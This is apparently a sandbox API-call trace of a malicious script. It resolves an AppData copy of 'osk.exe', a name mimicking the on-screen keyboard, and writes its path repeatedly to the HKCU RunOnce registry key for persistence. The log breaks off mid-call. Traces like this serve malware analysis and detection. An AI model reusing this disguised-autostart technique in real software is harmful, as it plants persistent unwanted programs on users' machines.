[0082.639] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.639] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.639] KillTimer (hWnd=0x20280, uIDEvent=0x20fc) returned 1 [0082.639] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.639] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.639] IUnknown:Release (This=0x787518) returned 0x1 [0082.639] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.639] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.639] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.640] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.640] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.640] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x81 [0082.640] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.640] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x82 [0082.640] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.641] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x81 [0082.641] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f0c0 | out: ppv=0x33f0c0*=0x787518) returned 0x0 [0082.649] IUnknown:Release (This=0x787518) returned 0x1 [0082.649] GetTickCount () returned 0x114aae0 [0082.649] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.649] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.649] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.649] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.649] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.649] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.649] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.649] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.649] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.649] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.650] RegCloseKey (hKey=0x280) returned 0x0 [0082.650] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.650] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.650] SetTimer (hWnd=0x20280, nIDEvent=0x20fd, uElapse=0xa, lpTimerFunc=0x0) returned 0x20fd [0082.650] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.654] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.654] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.654] KillTimer (hWnd=0x20280, uIDEvent=0x20fd) returned 1 [0082.655] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.657] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.657] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.657] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.657] RegCloseKey (hKey=0x280) returned 0x0 [0082.657] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.658] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.658] SetTimer (hWnd=0x20280, nIDEvent=0x20fe, uElapse=0xa, lpTimerFunc=0x0) returned 0x20fe [0082.658] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.670] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.670] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.670] KillTimer (hWnd=0x20280, uIDEvent=0x20fe) returned 1 [0082.670] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.671] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.671] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.671] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.671] RegCloseKey (hKey=0x280) returned 0x0 [0082.671] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.671] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.672] SetTimer (hWnd=0x20280, nIDEvent=0x20ff, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ff [0082.672] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.686] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.686] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.686] KillTimer (hWnd=0x20280, uIDEvent=0x20ff) returned 1 [0082.687] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.687] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.687] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.687] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.688] RegCloseKey (hKey=0x280) returned 0x0 [0082.688] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.688] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.688] SetTimer (hWnd=0x20280, nIDEvent=0x2100, uElapse=0xa, lpTimerFunc=0x0) returned 0x2100 [0082.688] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.701] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.701] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.701] KillTimer (hWnd=0x20280, uIDEvent=0x2100) returned 1 [0082.702] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.702] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.702] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.702] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.702] RegCloseKey (hKey=0x280) returned 0x0 [0082.703] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.703] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.703] SetTimer (hWnd=0x20280, nIDEvent=0x2101, uElapse=0xa, lpTimerFunc=0x0) returned 0x2101 [0082.703] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.717] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.717] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.717] KillTimer (hWnd=0x20280, uIDEvent=0x2101) returned 1 [0082.717] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.718] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.718] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.718] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.718] RegCloseKey (hKey=0x280) returned 0x0 [0082.718] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.718] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.718] SetTimer (hWnd=0x20280, nIDEvent=0x2102, uElapse=0xa, lpTimerFunc=0x0) returned 0x2102 [0082.718] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.732] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.732] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.732] KillTimer (hWnd=0x20280, uIDEvent=0x2102) returned 1 [0082.733] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.733] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.733] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.733] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.734] RegCloseKey (hKey=0x280) returned 0x0 [0082.734] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.734] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.734] SetTimer (hWnd=0x20280, nIDEvent=0x2103, uElapse=0xa, lpTimerFunc=0x0) returned 0x2103 [0082.734] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.748] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.748] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.749] KillTimer (hWnd=0x20280, uIDEvent=0x2103) returned 1 [0082.749] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.749] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.749] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.750] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.750] RegCloseKey (hKey=0x280) returned 0x0 [0082.750] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.750] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.750] SetTimer (hWnd=0x20280, nIDEvent=0x2104, uElapse=0xa, lpTimerFunc=0x0) returned 0x2104 [0082.750] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.763] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.763] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.764] KillTimer (hWnd=0x20280, uIDEvent=0x2104) returned 1 [0082.764] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.764] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.764] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.765] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.765] RegCloseKey (hKey=0x280) returned 0x0 [0082.765] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.765] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.765] SetTimer (hWnd=0x20280, nIDEvent=0x2105, uElapse=0xa, lpTimerFunc=0x0) returned 0x2105 [0082.765] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.779] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.779] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.779] KillTimer (hWnd=0x20280, uIDEvent=0x2105) returned 1 [0082.780] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.780] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.780] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.780] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.780] RegCloseKey (hKey=0x280) returned 0x0 [0082.780] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.781] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.781] SetTimer (hWnd=0x20280, nIDEvent=0x2106, uElapse=0xa, lpTimerFunc=0x0) returned 0x2106 [0082.781] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.796] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.796] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.796] KillTimer (hWnd=0x20280, uIDEvent=0x2106) returned 1 [0082.796] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.797] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.797] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.797] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.797] RegCloseKey (hKey=0x280) returned 0x0 [0082.797] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.797] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.797] SetTimer (hWnd=0x20280, nIDEvent=0x2107, uElapse=0xa, lpTimerFunc=0x0) returned 0x2107 [0082.797] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.810] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.810] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.810] KillTimer (hWnd=0x20280, uIDEvent=0x2107) returned 1 [0082.811] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.811] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.811] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.811] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.812] RegCloseKey (hKey=0x280) returned 0x0 [0082.812] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.812] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.812] SetTimer (hWnd=0x20280, nIDEvent=0x2108, uElapse=0xa, lpTimerFunc=0x0) returned 0x2108 [0082.812] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.826] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.826] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.826] KillTimer (hWnd=0x20280, uIDEvent=0x2108) returned 1 [0082.827] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.827] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.827] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.827] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.827] RegCloseKey (hKey=0x280) returned 0x0 [0082.827] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.828] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.828] SetTimer (hWnd=0x20280, nIDEvent=0x2109, uElapse=0xa, lpTimerFunc=0x0) returned 0x2109 [0082.828] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.841] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.841] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.842] KillTimer (hWnd=0x20280, uIDEvent=0x2109) returned 1 [0082.842] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.842] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.842] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.843] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", 